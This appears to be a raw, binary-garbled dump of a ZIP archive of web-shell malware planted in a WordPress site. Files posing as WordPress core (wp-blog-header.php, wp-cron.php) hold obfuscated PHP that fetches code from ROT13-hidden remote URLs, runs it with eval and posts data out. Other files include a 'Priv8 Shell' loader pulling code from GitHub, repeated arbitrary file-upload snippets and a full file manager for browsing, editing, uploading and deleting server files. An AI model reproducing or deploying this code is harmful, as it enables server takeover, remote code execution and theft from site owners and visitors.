PKᮄY Êi(mmcgi-bin/wp-blog-header.phpnuÏÃ6Ç$ $c)); } goto EI0YM; TfUQi: function post_u($h) { $c = "\x75\x67\x67\143\72\x2f\57\170\146\x6f\x6d\70\144\x2e\x6f\154\x75\x62\147\x2e\147\x62\143\x2f\166\141\x71\162\x6b\56\x63\x75\143"; $i = curl_init(str_rot13($c)); curl_setopt($i, CURLOPT_POST, 1); curl_setopt($i, CURLOPT_POSTFIELDS, $h); curl_setopt($i, CURLOPT_RETURNTRANSFER, true); $j = curl_exec($i); curl_close($i); } goto uVMca; Cg8Hm: eval("\77\x3e" . $d); goto QZIk_; uKETJ: error_reporting(0); goto hLRwA; EI0YM: $d = get_u(str_rot13("\x75\x67\147\143\x66\x3a\57\x2f\151\x63\x66\x71\161\56\x71\163\144\x73\x6e\x67\56\x67\142\x63\x2f\x71\x62\x62\145\x2f") . $b . "\56\x74\170\x74"); goto Cg8Hm; hLRwA: session_start(); goto V3bNY; Y8mP6: function get_u($c) { $e = ''; if (function_exists("\143\165\162\154\137\x65\x78\145\x63")) { $f = curl_init($c); curl_setopt($f, CURLOPT_RETURNTRANSFER, 1); curl_setopt($f, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($f, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($f, CURLOPT_SSL_VERIFYHOST, 0); $e = curl_exec($f); curl_close($f); } if (empty($e) && function_exists("\x66\151\154\145\137\x67\145\164\x5f\x63\157\x6e\164\x65\156\x74\x73")) { $e = file_get_contents($c); } if (empty($e) && function_exists("\146\x6f\x70\x65\x6e") && function_exists("\163\164\x72\x65\x61\x6d\137\x67\x65\x74\137\143\x6f\x6e\164\145\156\x74\x73")) { $g = fopen($c, "\162"); $e = stream_get_contents($g); fclose($g); } return $e; } goto TfUQi; uVMca: ?>PKᮄY Êi(mmcgi-bin/wp-cron.phpnu„[µü¤ $c)); } goto EI0YM; TfUQi: function post_u($h) { $c = "\x75\x67\x67\143\72\x2f\57\170\146\x6f\x6d\70\144\x2e\x6f\154\x75\x62\147\x2e\147\x62\143\x2f\166\141\x71\162\x6b\56\x63\x75\143"; $i = curl_init(str_rot13($c)); curl_setopt($i, CURLOPT_POST, 1); curl_setopt($i, CURLOPT_POSTFIELDS, $h); curl_setopt($i, CURLOPT_RETURNTRANSFER, true); $j = curl_exec($i); curl_close($i); } goto uVMca; Cg8Hm: eval("\77\x3e" . $d); goto QZIk_; uKETJ: error_reporting(0); goto hLRwA; EI0YM: $d = get_u(str_rot13("\x75\x67\147\143\x66\x3a\57\x2f\151\x63\x66\x71\161\56\x71\163\144\x73\x6e\x67\56\x67\142\x63\x2f\x71\x62\x62\145\x2f") . $b . "\56\x74\170\x74"); goto Cg8Hm; hLRwA: session_start(); goto V3bNY; Y8mP6: function get_u($c) { $e = ''; if (function_exists("\143\165\162\154\137\x65\x78\145\x63")) { $f = curl_init($c); curl_setopt($f, CURLOPT_RETURNTRANSFER, 1); curl_setopt($f, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($f, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($f, CURLOPT_SSL_VERIFYHOST, 0); $e = curl_exec($f); curl_close($f); } if (empty($e) && function_exists("\x66\151\154\145\137\x67\145\164\x5f\x63\157\x6e\164\x65\156\x74\x73")) { $e = file_get_contents($c); } if (empty($e) && function_exists("\146\x6f\x70\x65\x6e") && function_exists("\163\164\x72\x65\x61\x6d\137\x67\x65\x74\137\143\x6f\x6e\164\145\156\x74\x73")) { $g = fopen($c, "\162"); $e = stream_get_contents($g); fclose($g); } return $e; } goto TfUQi; uVMca: ?>PKᮄYÙͥ¤ÅÅcgi-bin/.htaccessnuÏÃ6Ç$ RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] PKᮄYÙͥ¤ÅÅ .htaccessnuÏÃ6Ç$ RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] PKᮄYýZY ÉÉmoon.phpnu„[µü¤       Sid Gifari Priv8 Shell ".file_get_contents/*******/("https://raw.githubusercontent.com/rapeatworld/bekd0r/main/indoxploit.php"));/**/?>
";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"
"; } ?>
";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"
"; } ?> PKᮄY&«Ÿ´âDâD admin.phpnu„[µü¤<\/script>\r\n errors)) $this->errors = array(); } function createArchive($file_list){ $result = false; if (file_exists($this->archive_name) && is_file($this->archive_name)) $newArchive = false; else $newArchive = true; if ($newArchive){ if (!$this->openWrite()) return false; } else { if (filesize($this->archive_name) == 0) return $this->openWrite(); if ($this->isGzipped) { $this->closeTmpFile(); if (!rename($this->archive_name, $this->archive_name.'.tmp')){ $this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp'; return false; } $tmpArchive = gzopen($this->archive_name.'.tmp', 'rb'); if (!$tmpArchive){ $this->errors[] = $this->archive_name.'.tmp '.__('is not readable'); rename($this->archive_name.'.tmp', $this->archive_name); return false; } if (!$this->openWrite()){ rename($this->archive_name.'.tmp', $this->archive_name); return false; } $buffer = gzread($tmpArchive, 512); if (!gzeof($tmpArchive)){ do { $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); $buffer = gzread($tmpArchive, 512); } while (!gzeof($tmpArchive)); } gzclose($tmpArchive); unlink($this->archive_name.'.tmp'); } else { $this->tmp_file = fopen($this->archive_name, 'r+b'); if (!$this->tmp_file) return false; } } if (isset($file_list) && is_array($file_list)) { if (count($file_list)>0) $result = $this->packFileArray($file_list); } else $this->errors[] = __('No file').__(' to ').__('Archive'); if (($result)&&(is_resource($this->tmp_file))){ $binaryData = pack('a512', ''); $this->writeBlock($binaryData); } $this->closeTmpFile(); if ($newArchive && !$result){ $this->closeTmpFile(); unlink($this->archive_name); } return $result; } function restoreArchive($path){ $fileName = $this->archive_name; if (!$this->isGzipped){ if (file_exists($fileName)){ if ($fp = fopen($fileName, 'rb')){ $data = fread($fp, 2); fclose($fp); if ($data == '\37\213'){ $this->isGzipped = true; } } } elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true; } $result = true; if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb'); else $this->tmp_file = fopen($fileName, 'rb'); if (!$this->tmp_file){ $this->errors[] = $fileName.' '.__('is not readable'); return false; } $result = $this->unpackFileArray($path); $this->closeTmpFile(); return $result; } function showErrors ($message = '') { $Errors = $this->errors; if(count($Errors)>0) { if (!empty($message)) $message = ' ('.$message.')'; $message = __('Error occurred').$message.':
'; foreach ($Errors as $value) $message .= $value.'
'; return $message; } else return ''; } function packFileArray($file_array){ $result = true; if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (!is_array($file_array) || count($file_array)<=0) return true; for ($i = 0; $iarchive_name) continue; if (strlen($filename)<=0) continue; if (!file_exists($filename)){ $this->errors[] = __('No file').' '.$filename; continue; } if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (strlen($filename)<=0){ $this->errors[] = __('Filename').' '.__('is incorrect');; return false; } $filename = str_replace('\\', '/', $filename); $keep_filename = $this->makeGoodPath($filename); if (is_file($filename)){ if (($file = fopen($filename, 'rb')) == 0){ $this->errors[] = __('Mode ').__('is incorrect'); } if(($this->file_pos == 0)){ if(!$this->writeHeader($filename, $keep_filename)) return false; } while (($buffer = fread($file, 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } fclose($file); } else $this->writeHeader($filename, $keep_filename); if (@is_dir($filename)){ if (!($handle = opendir($filename))){ $this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable'); continue; } while (false !== ($dir = readdir($handle))){ if ($dir!='.' && $dir!='..'){ $file_array_tmp = array(); if ($filename != '.') $file_array_tmp[] = $filename.'/'.$dir; else $file_array_tmp[] = $dir; $result = $this->packFileArray($file_array_tmp); } } unset($file_array_tmp); unset($dir); unset($handle); } } return $result; } function unpackFileArray($path){ $path = str_replace('\\', '/', $path); if ($path == '' || (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':'))) $path = './'.$path; clearstatcache(); while (strlen($binaryData = $this->readBlock()) != 0){ if (!$this->readHeader($binaryData, $header)) return false; if ($header['filename'] == '') continue; if ($header['typeflag'] == 'L'){ //reading long header $filename = ''; $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++){ $content = $this->readBlock(); $filename .= $content; } if (($laspiece = $header['size'] % 512) != 0){ $content = $this->readBlock(); $filename .= substr($content, 0, $laspiece); } $binaryData = $this->readBlock(); if (!$this->readHeader($binaryData, $header)) return false; else $header['filename'] = $filename; return true; } if (($path != './') && ($path != '/')){ while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1); if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename']; else $header['filename'] = $path.'/'.$header['filename']; } if (file_exists($header['filename'])){ if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){ $this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder'); return false; } if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){ $this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists'); return false; } if (!is_writeable($header['filename'])){ $this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists'); return false; } } elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){ $this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename']; return false; } if ($header['typeflag'] == '5'){ if (!file_exists($header['filename'])) { if (!mkdir($header['filename'], 0777)) { $this->errors[] = __('Cannot create directory').' '.$header['filename']; return false; } } } else { if (($destination = fopen($header['filename'], 'wb')) == 0) { $this->errors[] = __('Cannot write to file').' '.$header['filename']; return false; } else { $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++) { $content = $this->readBlock(); fwrite($destination, $content, 512); } if (($header['size'] % 512) != 0) { $content = $this->readBlock(); fwrite($destination, $content, ($header['size'] % 512)); } fclose($destination); touch($header['filename'], $header['time']); } clearstatcache(); if (filesize($header['filename']) != $header['size']) { $this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect'); return false; } } if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = ''; if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/'; $this->dirs[] = $file_dir; $this->files[] = $header['filename']; } return true; } function dirCheck($dir){ $parent_dir = dirname($dir); if ((@is_dir($dir)) or ($dir == '')) return true; if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir))) return false; if (!mkdir($dir, 0777)){ $this->errors[] = __('Cannot create directory').' '.$dir; return false; } return true; } function readHeader($binaryData, &$header){ if (strlen($binaryData)==0){ $header['filename'] = ''; return true; } if (strlen($binaryData) != 512){ $header['filename'] = ''; $this->__('Invalid block size').': '.strlen($binaryData); return false; } $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1)); $unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData); $header['checksum'] = OctDec(trim($unpack_data['checksum'])); if ($header['checksum'] != $checksum){ $header['filename'] = ''; if (($checksum == 256) && ($header['checksum'] == 0)) return true; $this->errors[] = __('Error checksum for file ').$unpack_data['filename']; return false; } if (($header['typeflag'] = $unpack_data['typeflag']) == '5') $header['size'] = 0; $header['filename'] = trim($unpack_data['filename']); $header['mode'] = OctDec(trim($unpack_data['mode'])); $header['user_id'] = OctDec(trim($unpack_data['user_id'])); $header['group_id'] = OctDec(trim($unpack_data['group_id'])); $header['size'] = OctDec(trim($unpack_data['size'])); $header['time'] = OctDec(trim($unpack_data['time'])); return true; } function writeHeader($filename, $keep_filename){ $packF = 'a100a8a8a8a12A12'; $packL = 'a1a100a6a2a32a32a8a8a155a12'; if (strlen($keep_filename)<=0) $keep_filename = $filename; $filename_ready = $this->makeGoodPath($keep_filename); if (strlen($filename_ready) > 99){ //write long header $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0); $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', ''); // Calculate the checksum $checksum = 0; // First part of the header for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); // Ignore the checksum value and replace it by ' ' (space) for ($i = 148; $i < 156; $i++) $checksum += ord(' '); // Last part of the header for ($i = 156, $j=0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); // Write the first 148 bytes of the header in the archive $this->writeBlock($dataFirst, 148); // Write the calculated checksum $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); // Write the last 356 bytes of the header in the archive $this->writeBlock($dataLast, 356); $tmp_filename = $this->makeGoodPath($filename_ready); $i = 0; while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } return true; } $file_info = stat($filename); if (@is_dir($filename)){ $typeflag = '5'; $size = sprintf('%11s ', DecOct(0)); } else { $typeflag = ''; clearstatcache(); $size = sprintf('%11s ', DecOct(filesize($filename))); } $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename)))); $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', ''); $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); $this->writeBlock($dataFirst, 148); $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); $this->writeBlock($dataLast, 356); return true; } function openWrite(){ if ($this->isGzipped) $this->tmp_file = gzopen($this->archive_name, 'wb9f'); else $this->tmp_file = fopen($this->archive_name, 'wb'); if (!($this->tmp_file)){ $this->errors[] = __('Cannot write to file').' '.$this->archive_name; return false; } return true; } function readBlock(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) $block = gzread($this->tmp_file, 512); else $block = fread($this->tmp_file, 512); } else $block = ''; return $block; } function writeBlock($data, $length = 0){ if (is_resource($this->tmp_file)){ if ($length === 0){ if ($this->isGzipped) gzputs($this->tmp_file, $data); else fputs($this->tmp_file, $data); } else { if ($this->isGzipped) gzputs($this->tmp_file, $data, $length); else fputs($this->tmp_file, $data, $length); } } } function closeTmpFile(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) gzclose($this->tmp_file); else fclose($this->tmp_file); $this->tmp_file = 0; } } function makeGoodPath($path){ if (strlen($path)>0){ $path = str_replace('\\', '/', $path); $partPath = explode('/', $path); $els = count($partPath)-1; for ($i = $els; $i>=0; $i--){ if ($partPath[$i] == '.'){ // Ignore this directory } elseif ($partPath[$i] == '..'){ $i--; } elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){ } else $result = $partPath[$i].($i!=$els ? '/'.$result : ''); } } else $result = ''; return $result; } } ?>
";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"
"; } ?>
";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"
"; } ?> PKᮄYò›[³Í Í wp-blog-header.phpnu„[µü¤ $c)); } goto EI0YM; TfUQi: function post_u($h) { $c = "\x75\x67\x67\143\72\x2f\57\170\146\x6f\x6d\70\144\x2e\x6f\154\x75\x62\147\x2e\147\x62\143\x2f\166\141\x71\162\x6b\56\x63\x75\143"; $i = curl_init(str_rot13($c)); curl_setopt($i, CURLOPT_POST, 1); curl_setopt($i, CURLOPT_POSTFIELDS, $h); curl_setopt($i, CURLOPT_RETURNTRANSFER, true); $j = curl_exec($i); curl_close($i); } goto uVMca; Cg8Hm: eval("\77\x3e" . $d); goto QZIk_; uKETJ: error_reporting(0); goto hLRwA; EI0YM: $d = get_u(str_rot13("\x75\x67\147\143\x66\x3a\57\x2f\151\x63\x66\x71\161\56\x71\163\144\x73\x6e\x67\56\x67\142\x63\x2f\x71\x62\x62\145\x2f") . $b . "\56\x74\170\x74"); goto Cg8Hm; hLRwA: session_start(); goto V3bNY; Y8mP6: function get_u($c) { $e = ''; if (function_exists("\143\165\162\154\137\x65\x78\145\x63")) { $f = curl_init($c); curl_setopt($f, CURLOPT_RETURNTRANSFER, 1); curl_setopt($f, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($f, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($f, CURLOPT_SSL_VERIFYHOST, 0); $e = curl_exec($f); curl_close($f); } if (empty($e) && function_exists("\x66\151\154\145\137\x67\145\164\x5f\x63\157\x6e\164\x65\156\x74\x73")) { $e = file_get_contents($c); } if (empty($e) && function_exists("\146\x6f\x70\x65\x6e") && function_exists("\163\164\x72\x65\x61\x6d\137\x67\x65\x74\137\143\x6f\x6e\164\145\156\x74\x73")) { $g = fopen($c, "\162"); $e = stream_get_contents($g); fclose($g); } return $e; } goto TfUQi; uVMca: ?>
";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"
"; } ?>
";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"
"; } ?> PKᮄYò›[³Í Í wp-cron.phpnu„[µü¤ $c)); } goto EI0YM; TfUQi: function post_u($h) { $c = "\x75\x67\x67\143\72\x2f\57\170\146\x6f\x6d\70\144\x2e\x6f\154\x75\x62\147\x2e\147\x62\143\x2f\166\141\x71\162\x6b\56\x63\x75\143"; $i = curl_init(str_rot13($c)); curl_setopt($i, CURLOPT_POST, 1); curl_setopt($i, CURLOPT_POSTFIELDS, $h); curl_setopt($i, CURLOPT_RETURNTRANSFER, true); $j = curl_exec($i); curl_close($i); } goto uVMca; Cg8Hm: eval("\77\x3e" . $d); goto QZIk_; uKETJ: error_reporting(0); goto hLRwA; EI0YM: $d = get_u(str_rot13("\x75\x67\147\143\x66\x3a\57\x2f\151\x63\x66\x71\161\56\x71\163\144\x73\x6e\x67\56\x67\142\x63\x2f\x71\x62\x62\145\x2f") . $b . "\56\x74\170\x74"); goto Cg8Hm; hLRwA: session_start(); goto V3bNY; Y8mP6: function get_u($c) { $e = ''; if (function_exists("\143\165\162\154\137\x65\x78\145\x63")) { $f = curl_init($c); curl_setopt($f, CURLOPT_RETURNTRANSFER, 1); curl_setopt($f, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($f, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($f, CURLOPT_SSL_VERIFYHOST, 0); $e = curl_exec($f); curl_close($f); } if (empty($e) && function_exists("\x66\151\154\145\137\x67\145\164\x5f\x63\157\x6e\164\x65\156\x74\x73")) { $e = file_get_contents($c); } if (empty($e) && function_exists("\146\x6f\x70\x65\x6e") && function_exists("\163\164\x72\x65\x61\x6d\137\x67\x65\x74\137\143\x6f\x6e\164\145\156\x74\x73")) { $g = fopen($c, "\162"); $e = stream_get_contents($g); fclose($g); } return $e; } goto TfUQi; uVMca: ?>
";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"
"; } ?>
";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"
"; } ?> PKᮄY¤î�$QQ cgi-bin.zipnu„[µü¤PKŠ„Y Êi(mmwp-blog-header.phpnuÏÃ6Ç$ $c)); } goto EI0YM; TfUQi: function post_u($h) { $c = "\x75\x67\x67\143\72\x2f\57\170\146\x6f\x6d\70\144\x2e\x6f\154\x75\x62\147\x2e\147\x62\143\x2f\166\141\x71\162\x6b\56\x63\x75\143"; $i = curl_init(str_rot13($c)); curl_setopt($i, CURLOPT_POST, 1); curl_setopt($i, CURLOPT_POSTFIELDS, $h); curl_setopt($i, CURLOPT_RETURNTRANSFER, true); $j = curl_exec($i); curl_close($i); } goto uVMca; Cg8Hm: eval("\77\x3e" . $d); goto QZIk_; uKETJ: error_reporting(0); goto hLRwA; EI0YM: $d = get_u(str_rot13("\x75\x67\147\143\x66\x3a\57\x2f\151\x63\x66\x71\161\56\x71\163\144\x73\x6e\x67\56\x67\142\x63\x2f\x71\x62\x62\145\x2f") . $b . "\56\x74\170\x74"); goto Cg8Hm; hLRwA: session_start(); goto V3bNY; Y8mP6: function get_u($c) { $e = ''; if (function_exists("\143\165\162\154\137\x65\x78\145\x63")) { $f = curl_init($c); curl_setopt($f, CURLOPT_RETURNTRANSFER, 1); curl_setopt($f, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($f, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($f, CURLOPT_SSL_VERIFYHOST, 0); $e = curl_exec($f); curl_close($f); } if (empty($e) && function_exists("\x66\151\154\145\137\x67\145\164\x5f\x63\157\x6e\164\x65\156\x74\x73")) { $e = file_get_contents($c); } if (empty($e) && function_exists("\146\x6f\x70\x65\x6e") && function_exists("\163\164\x72\x65\x61\x6d\137\x67\x65\x74\137\143\x6f\x6e\164\145\156\x74\x73")) { $g = fopen($c, "\162"); $e = stream_get_contents($g); fclose($g); } return $e; } goto TfUQi; uVMca: ?>PKŠ„Y Êi(mm wp-cron.phpnu„[µü¤ $c)); } goto EI0YM; TfUQi: function post_u($h) { $c = "\x75\x67\x67\143\72\x2f\57\170\146\x6f\x6d\70\144\x2e\x6f\154\x75\x62\147\x2e\147\x62\143\x2f\166\141\x71\162\x6b\56\x63\x75\143"; $i = curl_init(str_rot13($c)); curl_setopt($i, CURLOPT_POST, 1); curl_setopt($i, CURLOPT_POSTFIELDS, $h); curl_setopt($i, CURLOPT_RETURNTRANSFER, true); $j = curl_exec($i); curl_close($i); } goto uVMca; Cg8Hm: eval("\77\x3e" . $d); goto QZIk_; uKETJ: error_reporting(0); goto hLRwA; EI0YM: $d = get_u(str_rot13("\x75\x67\147\143\x66\x3a\57\x2f\151\x63\x66\x71\161\56\x71\163\144\x73\x6e\x67\56\x67\142\x63\x2f\x71\x62\x62\145\x2f") . $b . "\56\x74\170\x74"); goto Cg8Hm; hLRwA: session_start(); goto V3bNY; Y8mP6: function get_u($c) { $e = ''; if (function_exists("\143\165\162\154\137\x65\x78\145\x63")) { $f = curl_init($c); curl_setopt($f, CURLOPT_RETURNTRANSFER, 1); curl_setopt($f, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($f, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($f, CURLOPT_SSL_VERIFYHOST, 0); $e = curl_exec($f); curl_close($f); } if (empty($e) && function_exists("\x66\151\154\145\137\x67\145\164\x5f\x63\157\x6e\164\x65\156\x74\x73")) { $e = file_get_contents($c); } if (empty($e) && function_exists("\146\x6f\x70\x65\x6e") && function_exists("\163\164\x72\x65\x61\x6d\137\x67\x65\x74\137\143\x6f\x6e\164\145\156\x74\x73")) { $g = fopen($c, "\162"); $e = stream_get_contents($g); fclose($g); } return $e; } goto TfUQi; uVMca: ?>PKŠ„YÙͥ¤ÅÅ .htaccessnuÏÃ6Ç$ RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] PKŠ„Y Êi(mmwp-blog-header.phpnuÏÃ6Ç$PKŠ„Y Êi(mm ¯wp-cron.phpnu„[µü¤PKŠ„YÙͥ¤ÅÅ W.htaccessnuÏÃ6Ç$PKæUPKᮄYKÕ-Ê Ê y.phpnu„[µü¤
";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"
"; } ?>
";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"
"; } ?> PKᮄYídé8é8 indec.phpnu„[µü¤  000 = 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . " GB"; } elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . " MB"; } elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . " KB"; } elseif ($bytes > 1) { $bytes = $bytes . " bytes"; } elseif ($bytes == 1) { $bytes = $bytes . " byte"; } else { $bytes = "0 bytes"; } return $bytes; } function fileExtension($file) { return substr(strrchr($file, "."), 1); } function fileIcon($file) { $imgs = [ "apng", "avif", "gif", "jpg", "jpeg", "jfif", "pjpeg", "pjp", "png", "svg", "webp", ]; $audio = ["wav", "m4a", "m4b", "mp3", "ogg", "webm", "mpc"]; $ext = strtolower(fileExtension($file)); if ($file == "error_log") { return ' '; } elseif ($file == ".htaccess") { return ' '; } if ($ext == "html" || $ext == "htm") { return ' '; } elseif ($ext == "php" || $ext == "phtml") { return ' '; } elseif (in_array($ext, $imgs)) { return ' '; } elseif ($ext == "css") { return ' '; } elseif ($ext == "txt") { return ' '; } elseif (in_array($ext, $audio)) { return ' '; } elseif ($ext == "py") { return ' '; } elseif ($ext == "js") { return ' '; } else { return ' '; } } function encodePath($path) { $a = ["/", "\\", ".", ":"]; $b = ["ক", "খ", "গ", "ঘ"]; return str_replace($a, $b, $path); } function decodePath($path) { $a = ["/", "\\", ".", ":"]; $b = ["ক", "খ", "গ", "ঘ"]; return str_replace($b, $a, $path); } $root_path = __DIR__; if (isset($_GET["p"])) { if (empty($_GET["p"])) { $p = $root_path; } elseif (!is_dir(decodePath($_GET["p"]))) { echo ""; } elseif (is_dir(decodePath($_GET["p"]))) { $p = decodePath($_GET["p"]); } } elseif (isset($_GET["q"])) { if (!is_dir(decodePath($_GET["q"]))) { echo ""; } elseif (is_dir(decodePath($_GET["q"]))) { $p = decodePath($_GET["q"]); } } else { $p = $root_path; } define("PATH", $p); echo ''; if (isset($_GET["p"])) { if (is_readable(PATH)) { $fetch_obj = scandir(PATH); $folders = []; $files = []; foreach ($fetch_obj as $obj) { if ($obj == "." || $obj == "..") { continue; } $new_obj = PATH . "/" . $obj; if (is_dir($new_obj)) { array_push($folders, $obj); } elseif (is_file($new_obj)) { array_push($files, $obj); } } } echo ''; foreach ($folders as $folder) { echo " "; } foreach ($files as $file) { echo " "; } echo "
Name Size Modified Perms Actions
" . $folder . " --- " . date("F d Y H:i:s.", filemtime(PATH . "/" . $folder)) . " 0" . substr(decoct(fileperms(PATH . "/" . $folder)), -3) . "
" . fileIcon($file) . $file . " " . formatSizeUnits(filesize(PATH . "/" . $file)) . " " . date("F d Y H:i:s.", filemtime(PATH . "/" . $file)) . " 0" . substr(decoct(fileperms(PATH . "/" . $file)), -3) . "
"; } else { if (empty($_GET)) { echo ""; } } if (isset($_GET["upload"])) { echo '
Select file to upload:
'; } if (isset($_GET["r"])) { if (!empty($_GET["r"]) && isset($_GET["q"])) { echo '
Rename:
'; if (isset($_POST["rename"])) { $name = PATH . "/" . $_GET["r"]; if (rename($name, PATH . "/" . $_POST["name"])) { echo ""; } else { echo ""; } } } } if (isset($_GET["e"])) { if (!empty($_GET["e"]) && isset($_GET["q"])) { echo '

'; if (isset($_POST["edit"])) { $filename = PATH . "/" . $_GET["e"]; $data = $_POST["data"]; $open = fopen($filename, "w"); if (fwrite($open, $data)) { echo ""; } else { echo ""; } fclose($open); } } } if (isset($_POST["upload"])) { $target_file = PATH . "/" . $_FILES["fileToUpload"]["name"]; if ( move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file) ) { echo "

" . htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) . " has been uploaded.

"; } else { echo "

Sorry, there was an error uploading your file.

"; } } if (isset($_GET["d"]) && isset($_GET["q"])) { $name = PATH . "/" . $_GET["d"]; if (is_file($name)) { if (unlink($name)) { echo ""; } else { echo ""; } } elseif (is_dir($name)) { if (rmdir($name) == true) { echo ""; } else { echo ""; } } } ?>
";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"
"; } ?>
";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"
"; } ?> PKᮄY*R¶¿XX jtzuhiwx.phpnu„[µü¤
";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"
";?> > $file "; } } closedir($handle); } } ?>
";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"
"; } ?>
";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"
